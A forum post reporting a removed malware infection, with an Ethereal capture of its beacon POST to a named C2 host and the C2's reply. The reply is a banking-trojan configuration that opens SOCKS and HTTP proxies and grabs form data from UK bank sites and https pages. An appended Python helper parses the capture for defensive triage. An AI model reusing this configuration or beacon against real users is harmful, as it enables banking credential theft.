R
-rehn-
I have manually removed a malware from my system.
It was opening a lot of ports.
And every time it opened a new port
it was "calling home" to 83.149.82.168
I can provide a full Ethereal dump
and the 3 "bad" files I found
if anybody is interested.
I have sent an email to the ISP's abuse address.
This is what Ethereal extracted:
POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0
Host: nugget-sales.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close
i=2246824488&v=2805&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=210&k=37103&m=37103&panic=0&c=United Kingdom&l=ENG&mo=0
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 04:00:09 GMT
Server: Apache/2.0.40 (Red Hat Linux)
Content-Length: 671
Connection: close
Content-Type: text/html; charset=ISO-8859-1
http +www.microsoft.com +Ba "Mozilla/4.0 (compatible\; MSIE 6.0\; Windows NT 5.1)"
rmold
socks 0.0.0.0:65535
httpp +0.0.0.0:65535
log +everything +Smz 1 9;setwnd 8 * * * +wclCME 60 1;timer -qewrqrewq;timer +qewrqrewq -R+AIc 10000000 "setwnd 8 * * * -E"
setwnd 0 *halifax-online.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 1 *.lloydstsb.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 2 *.nwolb.com* * * +urfKPMWS 4096 2 200000
setwnd 3 *.hsbc.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 4 *.barclays.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 17 https://* * * +urfKPBMW 4096 1000 2
setwnd 18 * https://* * +urfKPBMW 4096 1000 2
setwnd 19 * * * +urfKP*MW 4096 2
http #hosts +I 60000
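As an added example (not part of the post above), here is a small Python triage helper that parses the captured beacon and the C2 reply: it matches the POST to /cgi-bin/ref.cgi by its parameter names and pulls the bank host patterns out of the setwnd rules, which is the kind of check a defender would run over proxy logs or a pcap. The sample data is reconstructed from the capture with the wrapped lines rejoined; the 108-byte Content-Length in the capture is consistent with a single space in "United Kingdom".

```python
from urllib.parse import parse_qs

# Constructed sample, reassembled from the capture quoted in the post.
BEACON_PATH = "/cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005"
BEACON_BODY = ("i=2246824488&v=2805&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=210"
               "&k=37103&m=37103&panic=0&c=United Kingdom&l=ENG&mo=0")
C2_REPLY = r"""http +www.microsoft.com +Ba "Mozilla/4.0 (compatible\; MSIE 6.0\; Windows NT 5.1)"
rmold
socks 0.0.0.0:65535
httpp +0.0.0.0:65535
log +everything +Smz 1 9;setwnd 8 * * * +wclCME 60 1;timer -qewrqrewq;timer +qewrqrewq -R+AIc 10000000 "setwnd 8 * * * -E"
setwnd 0 *halifax-online.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 1 *.lloydstsb.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 2 *.nwolb.com* * * +urfKPMWS 4096 2 200000
setwnd 3 *.hsbc.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 4 *.barclays.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 17 https://* * * +urfKPBMW 4096 1000 2
setwnd 18 * https://* * +urfKPBMW 4096 1000 2
setwnd 19 * * * +urfKP*MW 4096 2
http #hosts +I 60000"""

# The full set of form fields seen in the beacon. A POST to a ref.cgi path
# carrying every one of these names is a tight signature for this bot.
BEACON_KEYS = {"i", "v", "os", "s", "h", "d", "b", "u",
               "k", "m", "panic", "c", "l", "mo"}


def parse_beacon(path, body):
    """Return the interesting beacon fields, or None if the POST does not match."""
    if not path.startswith("/cgi-bin/ref.cgi"):
        return None
    # keep_blank_values so the empty s= and h= fields still count as present
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if not BEACON_KEYS.issubset(fields):
        return None
    return {"bot_id": fields["i"], "version": fields["v"],
            "os": fields["os"], "country": fields["c"]}


def targeted_domains(config):
    """List the concrete host patterns from every setwnd rule in the C2 reply."""
    domains = []
    for line in config.splitlines():
        for cmd in line.split(";"):          # several commands share one line
            parts = cmd.strip().split()
            if len(parts) >= 3 and parts[0] == "setwnd":
                host = parts[2].strip("*.")  # drop the wildcard padding
                if "." in host:              # skip bare "*" and "https://" rules
                    domains.append(host)
    return domains
```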